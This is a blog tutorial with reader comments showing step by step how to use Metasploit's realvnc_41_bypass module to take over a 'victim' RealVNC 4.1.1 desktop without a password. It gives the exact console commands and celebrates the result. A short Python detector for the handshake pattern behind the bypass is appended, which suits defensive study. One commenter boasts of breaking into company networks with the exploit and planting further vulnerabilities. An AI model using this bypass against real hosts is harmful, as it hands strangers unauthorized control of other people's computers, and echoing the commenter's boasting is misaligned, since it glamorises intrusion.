5 Simple Steps Bypass Real VNC Authentication


Type : Tutorial

Level : Easy

Victim O.S : Windows XP SP3

Victim Vulnerable Application : RealVNC 4.1.1

Attacker O.S : Backtrack 5 R1

While looking around the web I visited the 1337day.com website and saw a new remote exploit there for a RealVNC authentication bypass. securityfocus.com had actually already described this vulnerability here.

What is VNC? According to RealVNC website on realvnc.com :

RealVNC provides remote administration control software which lets you see and interact with desktop applications across any network.

RealVNC was a lifesaver for system administrators who were not too familiar with telnet or SSH, because they could see the desktop in real time. In short, it works much like Remote Desktop Connection.

Requirement :

1. Metasploit framework

Step By Step 5 Simple Steps Bypass Real VNC Authentication:

1. Open your terminal and type msfconsole command to go to your metasploit console.

2. Next you need to define the exploit you want to use, which is realvnc_41_bypass.

msf > use exploit/multi/vnc/realvnc_41_bypass

3. The main thing to remember about this type of attack is that we do not need to set up a payload, because we are attacking and bypassing the VNC login itself; the result of a successful run is that the victim's desktop is brought up on our computer 🙂

Let's view the available options by running the show options command:

[Screenshot: output of show options for realvnc_41_bypass]

Information :

autovnc --> automatically launch the VNC viewer

lport --> our local VNC viewer port (port 5900 is the default)

rhost --> target machine (victim computer)

rport --> target port on the victim machine (port 5900 is the default)

4. Set our target using the RHOST option:

msf  auxiliary(realvnc_41_bypass) > set rhost 192.168.8.94
rhost => 192.168.8.94

5. Okay, everything is set up so far; the final step is to run the exploit command.

[Screenshot: output of the exploit command]

Together with the output the script generates, we also get the victim's screen in our local VNC viewer:

[Screenshot: victim desktop shown in the local VNC viewer]

Yes, we're in! 🙂

Countermeasures :

1. Update your VNC to a newer version; as you can see from the securityfocus.com link above, the newest version is not vulnerable.
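As an added detection example (not part of the original post or of the Metasploit module), the Python below audits captured RFB 3.8 handshake bytes for the pattern this bypass relies on: the server offers only "VNC Authentication" (type 2), yet the client selects "None" (type 1) and RealVNC 4.1.1 accepts it. The handshake bytes are constructed for the example.

```python
"""Flag an RFB 3.8 security-type negotiation where the client picks a type the
server never offered. Constructed example (not from the tutorial or Metasploit):
RealVNC 4.1.1 accepted such a choice, so "None" (type 1) sent against a server
offering only "VNC Authentication" (type 2) skipped the password check."""

SEC_TYPE_NAMES = {0: "Invalid", 1: "None", 2: "VNC Authentication",
                  16: "Tight", 18: "TLS", 19: "VeNCrypt"}

def parse_server_security_types(msg: bytes) -> list[int]:
    """Server message after the version exchange: a 1-byte count followed
    by that many 1-byte security types. Count 0 means the server refused
    the connection and a reason string follows; no types are offered."""
    if not msg:
        raise ValueError("empty server security-types message")
    count = msg[0]
    if count == 0:
        return []
    if len(msg) < 1 + count:
        raise ValueError("truncated security-types list")
    return list(msg[1:1 + count])

def parse_client_choice(msg: bytes) -> int:
    """The client replies with exactly one byte naming its chosen type."""
    if len(msg) != 1:
        raise ValueError("client security-type selection must be one byte")
    return msg[0]

def audit_negotiation(server_msg: bytes, client_msg: bytes) -> dict:
    """Return offered/chosen types and whether the choice was never offered;
    a chosen 'None' the server did not offer is the bypass pattern."""
    offered = parse_server_security_types(server_msg)
    chosen = parse_client_choice(client_msg)
    mismatch = chosen not in offered
    return {
        "offered": [SEC_TYPE_NAMES.get(t, f"type {t}") for t in offered],
        "chosen": SEC_TYPE_NAMES.get(chosen, f"type {chosen}"),
        "mismatch": mismatch,          # any choice outside the offered list
        "alert": mismatch and chosen == 1,  # unoffered "None": bypass pattern
    }

if __name__ == "__main__":
    # Constructed captures: a normal session and one matching the bypass.
    for label, srv, cli in [("normal", b"\x01\x02", b"\x02"),
                            ("bypass", b"\x01\x02", b"\x01")]:
        print(label, audit_negotiation(srv, cli))
```

A server that rejects the unoffered selection (count mismatch followed by a connection close) is patched behaviour; a session that proceeds past this point with "alert" set is the one worth investigating.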

Hope you enjoyed it 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com


  • puppet

    is this exploit vulnerable to wireless network n LAN network only???

    • v4L

      #puppet
      any network if they are using this vulnerable vnc version can be exploited.

  • darkcrimson

    RealVNC patched this a long time ago. Metasploit also changed the directory to "auxillary/admin/vnc/realvnc_41_bypass" You never know, though. It's happened to me where I've run into a company using old versions of RealVNC and I've gained access. It's getting tougher and tougher nowadays.

    • v4L

      #darkcrimson
      LoL..you’re so true…but so sorry because I wrote this tutorial on July – August 2011 (almost 1 year ago) 🙂 you can see through the comment isn’t it? But thanks anyway to remind me to update this post 🙂

  • darkcrimson

    Ah! I wasn't trying to correct you. I was only pointing it out to anyone who stopped by. Hey, for what it's worth, the old exploit worked flawlessly for a long time. The benefit to it isn't only gaining access, but the "house rules" are once you're in, you can create even more vulnerabilities; which can really make the job fun. It was always nice to send the final report to the Systems Administrators telling them "Your network has failed my expectations. This network currently has 301 vulnerabilities over the entire subnet." -to which I would be employed to stick around and fix. Let's face it, that exploit would net me about 5k in a week. I miss those days.
